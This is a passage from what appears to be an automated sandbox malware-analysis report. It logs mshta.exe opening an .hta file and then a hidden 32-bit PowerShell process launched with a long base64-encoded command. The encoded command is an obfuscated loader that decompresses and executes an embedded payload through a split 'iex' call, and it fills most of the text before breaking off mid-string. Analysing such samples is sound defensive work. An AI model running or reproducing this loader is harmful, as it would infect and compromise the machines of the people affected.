                                                                                            Commandline:mshta.exe "C:\Users\user\Desktop\new-riii-1-b.pub.hta"
                                                                                            Imagebase:0x1f0000
                                                                                            File size:13'312 bytes
                                                                                            MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:2
                                                                                            Start time:12:25:04
                                                                                            Start date:15/01/2025
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc JABPAGUAQQA2AFoARwA5ADcAWgBEAGIANwBSAGgAaQBsAG0ARgA0ADkAWgBWADIAQgBuAG4AdQBDAHYAYgA2AFgAOQByAFcAZAAxAEIANgBFAGIANwBtADkAeAA5AHkAbwB2AFQAZABzAGsANwB4AFUASwBOAGwATQAwAEkAWABPAE8ANQBZAGYAVABUAHMAZgBOAEMAQgBCADEAVQBGAFQAdgBaADgAZAB4AGsAUgBDAGsAMgBCAGcAYgBGAHEAVwBKAEYAZwBkADUAaQBaADMAVgBQAFYANQB2AEMAMgBEADYAWgA3ADIANgBlAHQAMwBMADMAaABEAEIAdQBUAFIARQB4AGYAOQAwAGYAZgBiAFcAcgBSADUAVQA4AFYAVQBUAFUAaABpAFcAUABZAGUAeQBSADgAcQB6AHQAUwA0AFIAUQBHAEoARABXADIAcwBMAGkAcQB2AGcAbABTAEcAcQBJADEANQB2AE4ASwBWAEMAWAB5AFEAZgBTAHYAcQBPAG4AYQAwAEQAVgBrAGIAYQAzAEIAcQBUADIASABzADkAMABLAE8AdQAzAFgANABHAEMANgBSAHoAYgB1AFcAZgBZAEMAQQBHAFgASABVAFAATQBnAG8AQwBzAFIARgBvAHkAagB1AGYAdwBUAGwAYgB2AG0ANwBDAHcAMwBjAGgAUQBPAG8AcwB1AE0AYQB0AGMANQBDAHcAawBZAGMAZABaAGEAYwBKADcAZwBJAFAAbABXAHQAbwBTAGsAdABEADkANgBlAE0AYwBuAFgAaAB5AFoANQB5AHkARABFAHIAOQBqAFEAagBxAEoAagA4AE4AZQA0AGYAeABHAGkAegBOAHkARgBBAEUAZQBNAFoAVwAwADMAUwBaAFoAZwB2AFEAWQBqAG0AcgB0AFUAVwBMADcAawA3AFkAZABwADQATABsAE4AbwB4ADEAQwA4AFEAYgBmAE8AWQBvAFIAdgBXAHIAeABTAEsAQQBaADMAaQBpAFoAcgBNAHgATABkAGcAeABZAGIAYQBiAEcAMQBqAGsAMgB3AHcAVgBqAEUAYQB5AE4AbABCADQAeQAzAHkAWQAyAGUATwBMAEUARABSAEIASwBXAFUATgBmAGQAbgBsAFIATgAzAEUASAAxAGEAaABiAFcANQBQAEoAeQBYAEwAWgBsAFkAbwBJAHMAZgBGAGcAQwBmAG4AaQA1AGcAawBHADEAOQB2AHEAQwBtAEwARQBpAHUARQBMAGYAbQB4AHMARgBLAG8ANwBMAGkAYwBkAGUAOABBADUANwBWAGoAeQBTAEYAYwBvAGwASgA5AHIAZABOAE8AUABKAGYAVgBNADkAegBvAEEAWQBxAHUAdABaADYAcQBxAEQAWgBXAHIAMgB0AEEAegBuAEoAVQBhAEgAYQBKAGQAVwBaAHkAWQBmAG0AegBKAEoANAA1ADYAWgByAGcAcABzAEQAcwBDAHYASQB3AHMAYwBGAEEAbQA2AFYASABhAFQAaAA3AHUATABaAG8AbgBjAGwAQgBUAFkAbQBSAFEAcABYAFkAbgBEAFUAQwBiAG8AbQBWAFIATABiAHQAUwA5AHcAbgBmAFYASgBRAE4ASQBKAGcAbQBZAEcAcAB5AE8ARgBPAFoANgBmAFAARQBNAEIAUwA5AG8AZwBiAEgASAByAHcAZgBxAFMAUgBIADYATgBiAGEAOABmAEYAawBSAGcARwB5AGUAdgAwAHgAcQAxADEAVQBPAGgAVgA0AGgAUgA2AFgAMQBnADMAOQBrAFMANwBBAFQAWQBEAEgAaABlADMAdABIADYAQgBkAHIAVABDAEgAYwA2AE4AMgBhAGQAawBjAHUAeABoAHQAZQBvAFIAZQA2AGEAZgB6ADUAVQBEAG4AYgBnAE4AUQBLADkAcgBCAEsAMgBlAHUAZgA3AHIAcgBiAFgANQB6AEQAcAByADgAYgBUAEQATgBNAFkAYQBaAHoAcgBHADIAMwA3AHMAbgB6AFoATgBIAE4AVQBzAEgAYgB0AHgAVAB1ADAAagAxAFkASQBmAGIAWgBPAHIAcwA5AGwASgBxAE4AYwB5AFYAeABrAGkAMgBUAEgAVAB4AEIANQBaADcASgBBAE0AdwB5ADkAQgBsADUAUQBjAFcATgBBAGsAegA0AGQAUQBiAHAAdwBlAGgAMwB3AFEAWgBGAFIAMABkAEsARwBvAEoAbgAgAD0AIAAkAGYAQQBMAHMAZQANAAoAJAA1ADAAcwBEADQATgBzADMAbwBNADAAcgBQAEUAMwA0AFcASgBvAEQAQgA1AHQAeABnAEsATgBkADIAcABwAG0AOABVADMAVgBEADYAZwBuAHQAbgB1AFUAYQBCAGgAUgBLAEkAUgA2AEMAWQBNAHQAbQA5AGMAQQBQAFYAeQBlAGwASwBEADIASQBDAEEAZAA2AGQANABFAHMAUQBFAEUANwBBADAAegBpAHcAWQA5AGsAcgAwAFMATgA0AGgAMQB2AHkAeABRAFkAUQBpAEcAMABTAGMATgB3AFEATAByAE4AUQB0AFAAMgBTAEMAcwB2AHQAdwBrAGMARQAxAGkANABQAFIATQByAEcARwBnAGYAeQAxADMAegBVAGYANQBkADMAZgB6AE8AbQBNAE0ATwBLAFoAQgBLAEsAZABhAFMAMABVAFgAOQBWAFgAWABUADMAdABjADAATwBUAEMAUwBKAEoAbAA4AFoAdABYAGkAdgBTAHUAQgA0AFEAMAA0AEMAVwBRAFQAVAA1ADYAQQBqAFIAMgBNAHcAVwBvAFUATgBaAG4AYwBKAEoAbgBZAEkATgA4AEoAUQBPADcASwBoAHEAMgBaADcANwAwAGMANgBOAHoASABjAGoAbgBzADUAQwA0AFYAUQAwAGEAcgBjAHAANQBaAEMATwBjAEsAaABPAHgAeQBBAEMAVABFAEsAcABlAFUAbABMAHMAUQBiAE8ARgAxAFYAMABCAHIAcwA2AFEAbwBlAGcAZQBaAFkAbwBXAEkAYgBWAHcATQBJAEoAQwB4AEsATwBuADYAMwBpAE4AbQBFADYAYQBNAG4ARwBOADAAVQA3ADMATwB4AEgAUABGAEcAUwBjAG0AWgBlAHkAYQBqAEkAbAB3AEYAbABXAEQAbQB5ADAAagBGAEIAWgBoAHkAZABFAHMAaABUAHcAegBlAGkATQA3AGMANABrAGUAbwBTAFoAOAB1ADgAdQBrAGoAVAB1ADAAdgBQAG8ASABTAHoAMQBkAGUAWQAzAFUATgBtAG0AYgBzAHcAagBpAE8AUABuAGoAbQAwAGIANgAyAEEAMQBZAFgASAB0AFIAcQBaADkAQgBOAHkAegBqAFAAYQBpAHkANABrADgASABnADAAUQBFAEsANQB1AGUAbgBlAGEATQBOAFgAagA2AHcAdwBMADIAaQBIADMAdgAzAG8AdABtAFIAVgByAHgAdABIAHoAZQBNADEANgBXAHIAUwA1AEcAZABUAE4AeAB4AGEAcgBSAHYAegBnAGkAVwBZADcAYwBtAGYARgBjAFIAdQAxAHkAQgA2ADEAUAA2ADMAeQBIAEkAUgBsAEUAcQBQAEoARgBaADMAZgA5AHoAaAB3AFkAZwBHADMAYgBCAEgAcQA0AEcAagByAEMAawBuAFIAcABPAGsAbQBLAE4AMQBQAFYAdwBTAFAAZwBDAE8AbgBwAEsAeABYAEwARgBKAHMASQBxAEoAbwBUAEwASwBhAHMAQwAxAGgASQB1AE4ASgBvAGEAaABQAFEAYQBNADcATQBUAFMAdAB6ADcATAB6AEkAWgA0AEcAbwBmAFAARQByAFUAdQBRADgAbwAyAFcAZQBSAG4AQwBGADYAUwBHAFAANgA2AHYAbQA5AE4AdAByAEYAcwB6ADcAUwAwAEQASgBGAHEAcQB6AEUAcQB4AFoAdwBoAFMAQwBLAG8AQgBuAGkAZwA5ADMAMwBFAEEAQgBaAHAAaQBZAHYAYQA5AGUAdwBCAGsAOABnAEsAWABFAEUAbQBUAG8AOQBrAHoAWQBnAGMAaQBGAG4ARABCAGQAWgBMAG4AbABYAGsATABKADkAYgAxAHUAUwBSAEcATgB3AFUAdABMAHcAdwA1AFIAZAB4AHcAMwBhAHYAUQBnAHAAQgBNADcAMgB1AGkATQByAGIAWQBlAEYATgB3AE4ATABQAFUARQBtAGgAdQAwAE4AbABaADQAawBYAGoANQBFAHAANwBoADAAdQBkAHIAdAAxAEQAZwBMAHgAbQBTAGIAaAB4ADQAYgA1AGEAaAAxAFYAawBDADYAUwBnAGkAOQBhADYAcABpAEoAWQBIAGYAUwBHAEgAcgA4ADIAVgBPAG4AZgA1AEwAdABmAEUAVABBAGkAMQBWADYAMQA1AGoAWABvAHgATwBKADUATABUAG8ATgBCAEUAVQA2AEYAUwA2AHIASwBHAEMAYQBkAHkAdgBiADIAegBnAEgANABCAHEAcwAwAEsANQBYAHkAagBHAHcASQBQADAAYQBmAGgAMgBMAEYAZwAxADMAMABxAGsARQA0ADQAYQBUAGUANABCAHQAVgBuAEMAdABpAGQAZgBqAHQAdAA1AGkAUABwAFgAQQA5AHgAZwAxAGEAUwBOAHUAMQBXAFMAZwByAGcAMQBLAFYARwBSADgAcQB0ADkAUgBYAGMARQA5AHUAZwBqAGwAYQBBADMAQwBoADcAUABsAGgAYgBXAGUAQgBXAHgAQQBUAEMASQA5AGsAbABYADQAcQBjAEYAeAA1ADQAZwBVAHoATgBlAGsAVgBKAHYAdwB6AG8AMwBRAHUANQBYAHMAMwBiAGoARwBPADEAYgB3AEUASABkAG8AIAA9ACAAJAB0AFIAdQBFAA0ACgAkAEsAbAB3AFoAMgB2AFgANABDAEgAOQBlAGwAawA2AFYAOQBvADcAWQBSAEIATABFAHkANwBxAGgATgBFAHMAMQAzADMAcwBzAFIAegBJAGQAbwBPADcARABXADEAeAA0AG4AUgBTAEMAbQBlADgAaABlAFIAWgBmAGMAaABUADMATABrAEIAVwBoADkARABLAFMAUwBuAGUAbABqAHgAaQBuAE4AQwBvADUAbQBwAGkAegByAEMAcwBHAG4AVgBlAGoAcwA0AGgAWgBFADMATABQAFAAbwBTAE8AZwB1AEgASwBPAHIAaABJAHcAMABRADkARQBuAHEAZgBDAGUAeQBNAGgAUwB1AHAAZwB6AHUAMQAzAE4AYwA3ADQAWABOADkASQA1AFIANQBGAGYAVgA1AFEANQBGAG4AVAA4AGIAUgBtAGEANQBrAHMANQBPADkAZgBmAHcAaABVAE0ANgA5AGoAYgBBAFEAUABRAG0AcwBKAGgAWgB6AEsASgB4AGYAWgA1AFkAWQAzAFcASgBQAFAAdwBtADQAVgBTADQAcABQAHEARwAyAFMAWAB0ADcATQBSAEgAYQBwAHUASwBFAFgAdwB5AFcANQA4AE4ASAA2AGkAZQA3AE4ARAAxAHkATgBLAGoARQAgAD0AIAAkAE4AdQBMAGwADQAKACQATQBqADYAawB6ADIAZgBtAGcAegBPAEwANgBLAFIAMQBuAEcAUgBQAEwAUgA3ADYAdAAwAEcAQwA0AE4AYgBiAGYAVABaAEQAQwA4AGwAcwBiAFMAUwA5AHIAVQA2AG8AdgBpAHkATQBZAGEAeQBkAGEAdQB6ADYAMABhAGYAYgB2AEwAegBaAGUAVQBKAGQAcABhAGEAdQBzADcAQwAxAHgAbgBRAFAAVgBsAEIAOAA1AEIASQBHADUAZABSADYATQB5AGMAdABUAG8AVwBrAEYAWgBFAEQAMgBmAFIAVQBuAHoATQBkAE4AagA3AFAAVABFADEANQBnAE8AOABxAE0AOQBmAFMAagB6AGcAUwBMAGoAQwBCAHMAMABBAEgARQAzAFcANQBtAFEAZwBHADYARwA5AEoAbgBEAFAARABSAHMATwA1AGIAeQBEADYAZwB2AGsAWgBwAFgAUQBXAGEAcgB1AEsAQQBtAGkAZwByAE0AbwBhAEgAYgBLAHgANQA4AHUARgA0AHoANQBBAGsAZgA5AFQATwB4AHcAdgBFADAAegBSADIAMQBPAHUAWgBKAEoARgBrAHAAagB0ADcAMgBqAEUAcwA1AGgAUQBLAGkAUAB1AHIAWgA1ADgAaABlADMARQBIAFcAVQBkAFMAWgBtAGoAegBVAFEAbABjAFkAUQBJAE4AeABmAHgAeQBvAGEAbgA1AEUANgBXAGUAYwBqAHoAbABOAHIAZABBAHAAUAB6AEsATQBvAFcAWQB6AFYAcgBoAEoATgBWADgAMgBSADYAZgBVAHIAbgBHADYAOQA0AGoAbgBYADQASQBiAHMAdwBEADQASwBIAHUASwA1AHYAUwBCAG4AaABpAGsAbABpAEkAZQBXAFkASwB4AFIAbABGADIAcABRAGYAcABUAFEASQA3AEIAYQBoAGkAaABhAE4AbwBYAGkAMABoAGkAdABOAEQAVQBLAGkAQgBmAFQARAB0ADMAUABGAGMAWQBKAGYAZwBoAEYAdABnAHgAbAAxAEkAdQBCAGIAUQAzAGgAWAB1AGkARgBFAHgAcABUAFAAdwB6AEQAUwAyAHIAcABiADYAcQBuAFIAbABrAHEATQBOAGMATwB2AFAAWAB6AHgAdAB4AGMAawB5ADcAZgAwAEwAdABVAG4AbgB2AHgANABPAFIAVwBaAFIAdgAwAHgAQgBBAHYAOABlADYAdgBLAG4AZgBwAEoAUgA0AGYAeABwAGcAagBUAEYAUgB4AEcAZwA2AEkAMwA2AEsASwBJADgAcwBIADMAcgBCADcAegBmAFcANwA2AE8AVABCAFYANwBZAG4AMwBPAHAAMwBDAEoATQBNAHQAbQB6AEgASwBiADIAMgBtADgAbgBoAHcANABmAE8AbQBWAGMAZwB4AG0AWAA2AGUAVQBSAFIAZgAyAHAAbQBDAGgAcwBKAGkANwBCADUAdwBUAGgAMgBuADMAcAByADYAcgBvAGgASgBPAE8AUAA2AGsANgB0AE4AbABMADgAegBGAFQAcgBWAGwAaQBaAEQAdQBDAGkAMQBFAFAATwBTADMAcwBjADMAMQBtAFQATwAwAFgANQB0AFIAcABQAE4ATgBXAGMAdABGAEQAbQBSADAAdwBoAFkAdgB5AEsAbwBoAEQATAB4AHYAWABkAGgAZQAzADQAVABLAFoAeQB0AEMAdQB4AEoAegB4AGEAaQAxAHIAMABmAGwAUwBxAGsAcwBnAHEAUQBvAHEAUQAxAE0ARgBMAEkATABRAHkAdAA0AHoAVwBUAFYAbwBrAE0AcwBPAGYAQgBsAHIASgBuAE4ANQB5AGcAdQA0AFUAdgBhAGEAUwBFAGkAMgBOADIAWgBRAGkAVgAwAGQAdQB5AEQARgBRADgAMwBiAEcAOQBXAEEATABLAHIAYwA5AFMAVQBBAE0AZwBBAGMAdgB3AFAAVQBmAFQASwA2ADEAWQBjAHgAdABzAHYAVAB4AGcAWABJADUAeQBrAHkAZQB5AGEASQBVAGwAaQBhAFcAagBUAEEAcgA0AFUAbgBoAFgAWgBWAEMAegBBAHcAeABBAHQARQB4ADMAdABDAE4AUgBaAHAAUAB0AGsAUwAwAE8AYwBtAGcAawBHAEkAUQBKADEATABuAE0AQwBHAGsATwBFADMASwB2AGgAOQB4AGEANwByADMAcwBQADMASwBVAHkAUABiADIAVgBYAHIAMwBkAE0AbAB3AG0AaABIAHMARQBsAGUAZgA5AEkAWQBMAGQAYgBPADMAWAB5AFMAYwBYAGIAYwBEAE0AYQBqAGEAdABlAHQAdwB2ADYAagBEAGUASwBWADMAVQBPAGgAegBVAGQASwBXAHAANQAwAHMASQB0AEwAVwBxAHAAZABlAGQAdQBMAEoATgBsAFAAQgBIAG4AQgBhAFkAVQBCADgAVABLAGQAUwBSAHUAZwBBAEgAUABmAHcATABBAE8AeQBhAGoAQQBqACAAPQAiAEQAZQBmAGwAYQAiACAAKwAgACIAdABlAFMAdAByAGUAYQBtACIAOwAkAHUAdAAwAFQAawBaAFYASABiADcAQgAzADcARgBJAHgARgBSAEYAUgBDAGkAWABCAHkAaQBpAHMAZQAxAGIARwBmAFIAUQBWAHkASQA2ADgAUwBnAHMAWABUAGgATgA1AEwAawAwAHQAVABxAGEANgBBAGsAcQBuAEkAVQAwAEgAcAB2AHMAQQBmAFkAMABwAHgAbwBCADAAcABiAG0AQQBWAGsAUABrAEIAZQAyAE4AZgBjAHYAYgB6AEoAUgBnAHAAdABSAGcAbwBPAHEATwBHAHgAdQBxAGgARgBpADIAdgA3AEkAUABYAHgATABlAHUARQBpAGcAVgBpAHUAUQB1AFMAcgBvADcAcwBuAFAAUQA5ADYAUwBGAEQAZgB3AGgAZQBVAFQAQwA2ADYAegBZAEQAVABIADcAegBRAEUANgA1AE4AWgBSAFoAYQBpADIARwAzAGYAdgBWAFgAdgBkAHcAZgBjAHAAVgBaAHoAdQB0ADkANQBLAFUAaQBEADIASABIAGkAMABlAGUAMAB2ADAATwBiAEoARABKADIAMQBoAHgAUQBWAGEASABxAEgATgBtAFcAeQBTADIANwBLAGkAdgAzAHIAWQBFADQAZgBFAHIAVQBwAHAAcQBhADIAYgB1AHQAYwBxAFMANgBrAHUAZQBGAHkATgBaADgAVABpAE4AcgBtAHcAVABGAHYAMgBpAFUARABmAHQATQBqADUAcwBwAHkAZwAzADQAWABmADgAagBrAGIAbQB6AFkAZAA5AFUANgBCAGcAcQA0AGsAMABXAEEARwByAFAAawBKAE4AeABQADYATwAxADYAbwBBAGkAUgBSAFEAYQBrAHgAZABRAG8ANwBsAEcAbABrAFEAQgBFADkARgBOADgAcwBpAHoATgBPAFcAVQBUADMAdABkAHUASgBIAGgAWAA1AGQASgBrAEQASQBNAFQAMwBaAGsAWABmAGoAUgBnADcAMQBOAGYAMQB0AG0AawB4AGcAMgBDADIANQBtAFIAUgBNAEEAZwBYAHAAbABJAEsAZgA4AGUAdgBiADIAWAB2AFIATABJAFoARgBlAGcAcgBqAHkAcQBwAEUANwBwADIAdABtAHIANQBCAHMAVQBIADgATQByAGsAZABaAEsATgAxAHQAZwBEAGQAQwBEAFEAWABWAE4ATwBDAGkAWgA0AHIAWgBUAGUAVQByAHQASgB4AHoAUAA4AGcAWAB0AGkASwB2AEQAOQBHAGUAQgBNAEMARgAzAGQAdgBZAGEAMwBvAEoAVwBTAGcARAB0AFQARABUAEgARwBUAHoAcABiAEsAaABjAGoAcQBVAGsASQBxAGYAMwAxAEoAVwBiAHYAVQB6AFUAcQBTAEoAYwBSAHUARgBzAEcAWQBVAEwATgBFAEIAWABKAFkAMgB1AG0AdABLAG4AbgBRAHAAWAA4AFAAMgBKAG8AbABFAHgARgA3AHIAbABMADUASQA0AGwAcQBCAEQAbwBlAFMAOABjAEEAYQBzAEoASgA5AHkAYQBYAEYASQBPADIAOQBQACAAPQAgACIAQwBvAG0AcAByAGUAIgAgACsAIAAiAHMAcwBpAG8AbgAiADsAIAAkAEsAUQBrAHMAcQA3AFgAbwBVAHMAVwBxADAARABhAGMAVQBiADMAbABCAEgAbwBSAEIAWgB5AHEAdgBnAGUAQQBLAFAAagBQAHEASQBqAEoAVgBRAGYAMwBrADMAegBMAFkAVwBaAE0AZwBiADkAbQBtAFgASgBXADMAZgBmAHYAQQB0AGkAegB4AE8AZQBtAHMASQA1AHIAaQBSAHQAbQAwAFUAZABWAFoAagBSAGkAOQBLAFAAMQBvAHkASABrADQAagAwAFQAZQB3AFIANQBaAHYAVwA5AE0ANgBNAGkANQBkAEgATAB4AFgAdABQAGgAbABtAHgAUQBVAFoAOQBxAE8AZABDAFYARQBCAGcAYgBNAEIAcgBqAEMASABvAHUAMgA0AFMAWABOAEIAaQBZAEQAZgBCAGYAdQBHADkAZABSAFAAbQBlAFQAVwAxADgAUgBYAHkASQB4AHkAVwBHAEwAagBXAEsAcgBkAEoAVgBDADYAaQBTAHIAVwBCAEUAbQBwADEANgBYADgASABmAHAAVABjADMAQwBkAFYAUgBVAG0AcQA4AFAAdABxAGEAQQBHAE4ATQBrAEwAbABlAFAAbwBSAHYAWABoAE8AZQBiAEgAeABEAG8AcQBJAHMAdQByAGgAYwB1AEYANABlAE4ASgBiAG8AUwBNAGMASgBZAHIAOABJAHoAZgBmAEIASwAzADQAeQA4AEUAYQBWAHgAZwBHAHgAMABjAEMAQQBQAGUAVgBMAEMAOQBqAEQAOAAzAGUAagBSAGsAMQBTAEEAMgBHAFAAbABGAG8AeQBzAGoAeQBVAFAAcQBwAHAAZwBLAHMATwBWADAARQBTAGIAZAAzAG4AcAB4ADQAVwBDAEcARAA5ADMATABuAFkAcwBwADkAQQBQAGMAYwBBAHYARQB0AHoAVABNAEQATwBOAGIAegB4AGMAZgBKAEsAdgBRAHgAQwBEAGoARgBEAGoAZQBBAGoARgA0AHoAOAA4AHkANQBiAEUAeAAgAD0AIgBTAHQAcgBlAGEAIgAgACsAIAAiAG0AUgBlAGEAZABlAHIAIgA7ACAALgAoACIAaQAiACsAIgBlAHgAIgApACAAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgAkAEsAcQBLAFMAUQA3AFgAbwB1AHMAVwBRADAAZABBAGMAdQBiADMAbABCAGgAbwByAEIAWgBZAHEAdgBnAGUAQQBrAFAASgBwAHEASQBqAEoAVgBRAEYAMwBrADMAegBMAHkAdwBaAG0AZwBiADkAbQBtAFgAagB3ADMARgBmAFYAQQB0AEkAWgBYAE8ARQBtAFMASQA1AHIASQByAHQAbQAwAFUARABWAFoAagByAEkAOQBrAFAAMQBvAFkASABrADQASgAwAFQARQB3AFIANQBaAHYAVwA5AG0ANgBNAGkANQBkAGgATABYAFgAdABQAEgAbABtAHgAUQB1AHoAOQBxAG8AZABjAHYAZQBCAGcAQgBNAGIAcgBqAGMAaABvAHUAMgA0AHMAeABOAEIAaQBZAGQARgBCAEYAVQBHADkARABSAFAAbQBlAFQAVwAxADgAcgB4AFkAaQB4AFkAVwBnAEwASgBXAEsAUgBEAGoAVgBDADYASQBzAHIAVwBCAGUATQBQADEANgBYADgASABmAFAAVABDADMAYwBkAFYAcgB1AG0AUQA4AHAAdABxAEEAQQBHAG4AbQBrAGwAbABFAHAATwBSAFYAeABIAE8AZQBiAEgAeABEAE8AcQBJAFMAdQByAGgAYwB1AGYANABFAE4AagBCAE8AcwBtAGMAagB5AHIAOABpAHoARgBmAEIASwAzADQAWQA4AEUAQQBWAHgARwBnAHgAMABDAGMAQQBQAEUAdgBsAEMAOQBKAGQAOAAzAEUAagByAGsAMQBTAEEAMgBHAFAATABGAE8AeQBzAEoAWQB1AHAAUQBQAHAAZwBrAFMATwBWADAARQBzAGIARAAzAE4AUAB4ADQAdwBjAEcARAA5ADMATABOAFkAcwBQADkAQQBwAGMAYwBBAHYARQBUAHoAVABNAGQAbwBuAEIAWgBYAEMAZgBqAGsAVgBRAFgAYwBEAGoARgBEAEoAZQBhAGoARgA0AFoAOAA4AFkANQBCAEUAWAAgACgAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAG8ALgAkAFUAVAAwAFQASwBaAFYASABCADcAYgAzADcARgBJAHgARgBSAEYAUgBjAEkAWABCAFkAaQBpAFMARQAxAEIAZwBmAHIAUQBWAFkASQA2ADgAUwBnAHMAeAB0AEgAbgA1AGwAawAwAFQAdABxAGEANgBhAEsAUQBuAGkAdQAwAGgAcAB2AHMAYQBmAFkAMABwAHgAbwBCADAAUABiAE0AYQBWAGsAcABLAGIARQAyAE4ARgBjAFYAQgBaAGoAUgBHAHAAdAByAGcATwBvAFEATwBHAFgAVQBRAGgARgBJADIAdgA3AEkAcAB4AFgATABlAHUAZQBJAEcAdgBpAFUAUQBVAHMAcgBvADcAUwBuAFAAcQA5ADYAcwBGAGQARgBXAEgAZQBVAHQAQwA2ADYAWgBZAGQAdABoADcAWgBxAGUANgA1AE4AegBSAHoAQQBJADIARwAzAGYAVgBWAHgAdgBkAHcARgBjAHAAVgB6AHoAVQBUADkANQBLAFUAaQBkADIASABIAEkAMABlAGUAMAB2ADAATwBiAGoARABKADIAMQBoAHgAUQB2AEEAaABRAEgAbgBtAFcAWQBzADIANwBLAGkAVgAzAHIAWQBlADQARgBFAHIAVQBQAHAAcQBBADIAQgBVAFQAQwBxAHMANgBLAFUARQBGAFkATgBaADgAVABpAG4AUgBtAFcAVABmAHYAMgBpAHUARABGAHQAbQBqADUAcwBQAHkARwAzADQAWABmADgASgBLAGIATQBaAHkAZAA5AHUANgBiAEcAUQA0AEsAMABXAEEAZwBSAFAAawBqAE4AeABwADYATwAxADYATwBhAGkAUgByAFEAYQBrAHgARABxAG8ANwBsAEcAbABrAHEAYgBFADkAZgBuADgAcwBJAFoAbgBPAFcAVQB0ADMAVABkAHUAagBIAGgAWAA1AGQAagBLAEQAaQBNAFQAMwBaAEsAWABGAGoAcgBnADcAMQBOAGYAMQBUAE0AawBYAEcAMgBjADIANQBNAFIAUgBNAGEAZwB4AHAATABJAEsAZgA4AGUAVgBCADIAeAB2AHIATABpAFoARgBFAEcAcgBqAFkAcQBwAGUANwBwADIAVABtAHIANQBCAHMAVQBIADgATQBSAEsARAB6AGsAbgAxAFQAZwBkAEQAYwBkAFEAeABWAG4ATwBjAGkAWgA0AFIAWgB0AGUAVQBSAFQAagB4AFoAUAA4AGcAWAB0AEkAawB2AGQAOQBHAEUAYgBtAEMAZgAzAGQAdgB5AGEAMwBPAEoAVwBTAGcAZABUAHQAZAB0AGgAZwB0AFoAUABiAGsAaABjAGoAUQB1AGsASQBxAGYAMwAxAGoAVwBiAFYAdQBaAFUAUQBTAGoAYwBSAFUAZgBTAEcAeQBVAEwAbgBlAGIAeABKAHkAMgB1AE0AVABLAE4AbgBRAFAAWAA4AHAAMgBKAE8ATABlAFgARgA3AHIATABMADUAaQA0AEwAUQBCAGQAbwBFAHMAOABjAEEAYQBzAGoAagA5AFkAYQBYAGYAaQBPADIAOQBQAC4AJABtAGoANgBrAHoAMgBmAE0AZwBaAG8ATAA2AGsAcgAxAG4ARwByAFAAbAByADcANgB0ADAAZwBDADQAbgBCAEIARgB0AHoAZABjADgATABTAEIAUwBTADkAcgBVADYAbwBWAEkAeQBNAFkAYQBZAGQAYQBVAFoANgAwAGEAZgBCAHYATABaAFoAZQB1AEoARABwAEEAQQB1AHMANwBjADEAeABuAHEAUABWAGwAQgA4ADUAQgBpAEcANQBkAFIANgBNAFkAQwBUAHQATwBXAEsAZgBaAEUARAAyAEYAUgB1AG4AegBtAGQAbgBKADcAcAB0AGUAMQA1AGcAbwA4AFEATQA5AEYAcwBKAFoARwBzAEwAagBjAEIAUwAwAEEASABlADMAdwA1AG0AUQBnAEcANgBnADkASgBuAGQAcABEAFIAcwBPADUAQgBZAEQANgBHAFYAawBaAFAAWABxAFcAQQBSAHUASwBBAE0AaQBHAFIATQBvAEEASABiAGsAWAA1ADgAVQBGADQAWgA1AEEASwBGADkAVABPAHgAVwBWAGUAMABaAFIAMgAxAE8AdQBaAEoASgBGAGsAcABKAFQANwAyAGoAZQBzADUASABxAGsAaQBQAFUAUgBaADUAOABoAGUAMwBlAEgAVwB1AGQAUwB6AG0AagB6AFUAUQBsAGMAeQBxAGkAbgBYAGYAeAB5AE8AQQBOADUARQA2AFcAZQBDAGoAegBsAE4AcgBEAEEAcABwAHoASwBNAG8AdwB5AFoAVgByAGgASgBOAHYAOAAyAFIANgBmAHUAUgBuAEcANgA5ADQAagBOAHgANABJAGIAcwBXAGQANABrAGgAdQBLADUAVgBTAEIAbgBoAGkAawBsAEkAaQBlAFcAeQBLAFgAUgBsAGYAMgBwAFEAZgBwAFQAUQBpADcAQgBBAEgASQBoAGEAbgBvAHgASQAwAGgASQBUAG4AZABVAGsASQBCAGYAdABEAFQAMwBQAEYAQwBZAEoAZgBHAEgAZgBUAEcAWABMADEAaQB1AEIAQgBxADMASABYAHUASQBmAGUAeABQAFQAUAB3AFoARABzADIAcgBQAEIANgBxAE4AcgBMAGsAcQBtAE4AYwBPAHYAUAB4AFoAeAB0AHgAQwBrAFkANwBGADAAbABUAFUATgBOAFYAeAA0AE8AUgB3AHoAcgBWADAAWABCAEEAVgA4AEUANgBWAGsAbgBGAHAASgByADQAZgB4AFAAZwBKAHQAZgByAFgARwBHADYAaQAzADYASwBrAEkAOABzAGgAMwBSAGIANwBaAEYAVwA3ADYAbwB0AGIAVgA3AFkATgAzAG8AUAAzAEMAagBtAE0AdABNAHoAaABLAGIAMgAyAE0AOABuAEgAdwA0AGYAbwBNAHYAYwBHAHgATQBYADYARQBVAFIAUgBmADIAcABNAEMAaABTAGoASQA3AEIANQBXAHQAaAAyAG4AMwBQAHIANgBSAG8AaABKAG8ATwBQADYASwA2AFQATgBMAEwAOAB6AGYAdABSAFYAbABpAHoARABVAEMASQAxAGUAcABvAHMAMwBTAGMAMwAxAG0AVABvADAAWAA1AHQAcgBQAHAATgBOAFcAYwB0AEYAZABNAHIAMABXAEgAeQBWAHkASwBPAGgAZABsAFgAVgBYAGQASABlADMANAB0AGsAWgBZAFQAQwBVAHgASgB6AFgAYQBJADEAUgAwAEYATABTAHEAawBTAGcAUQBRAE8AUQBxADEAbQBmAGwASQBMAHEAeQB0ADQAegBXAFQAVgBPAEsATQBzAE8ARgBiAEwAUgBKAE4ATgA1AHkAZwBVADQAdQBWAEEAQQBTAGUAaQAyAG4AMgB6AHEAaQBWADAARABVAHkARABmAFEAOAAzAEIARwA5AHcAQQBMAEsAUgBDADkAcwBVAEEATQBHAGEAQwB2AFcAUABVAGYAVABrADYAMQB5AEMAWAB0AHMAdgB0AFgAZwB4AEkANQBZAGsAWQBFAHkAQQBJAHUAbABpAEEAdwBKAHQAYQByADQAVQBOAEgAWAB6AHYAQwBaAEEAdwB4AGEAVABlAHgAMwB0AGMATgBSAHoAcABQAHQAawBzADAATwBjAE0AZwBrAEcAaQBxAEoAMQBsAE4ATQBDAEcAawBPAGUAMwBrAHYAS